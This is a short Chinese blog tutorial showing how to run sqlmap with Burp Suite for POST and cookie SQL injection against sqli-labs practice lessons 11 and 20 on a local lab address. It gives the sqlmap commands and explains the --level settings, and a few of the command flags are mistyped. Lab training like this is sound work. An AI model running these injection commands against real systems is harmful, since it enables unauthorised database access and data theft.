sqlmap之post、cookie注入

sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。

一、POST注入

1.1 学习环境

本次使用的是kali集成的sqlmap、burpsuite,安装略过...

1.2 使用burpsuite抓包

less11是post注入关卡,所以打开页面随便输入内容提交表单,使用burpsuite拦截

将抓到的包保存为txt格式,任意命名,放在kali桌面或者任意地方

打开sqlmap,加载该文件,检测是否存在注入...

sqlmap -r /home/kali/.local/share/sqlmap/post-less11.txt -v 1

可以看到存在多种类型注入

查询当前数据库

sqlmap -r /home/kali/.local/share/sqlmap/post-less11.txt -v 1  --batch –current-db

拿到数据库,剩下的常规注入...

二、cookie注入

打开 less20 cookie注入关卡,登录成功获取cookie值

知道cookie值为"uname = admin and expires: Sat 27 Mar 2021 - 04:21:30",打开sqlmap输入注入参数

sqlmap.py -u "http://192.168.1.137/sqli/Less-20/index.php"  --cookie="uname = admin and expires: Sat 27 Mar 2021 - 04:21:30"  --dbs   --bacth  --level 3

默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当>=3的时候将检查User-agent和Referer。可以通过burpsuite等工具获取当前的cookie值,然后进行注入:

拿到数据库,剩下常规注入...

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容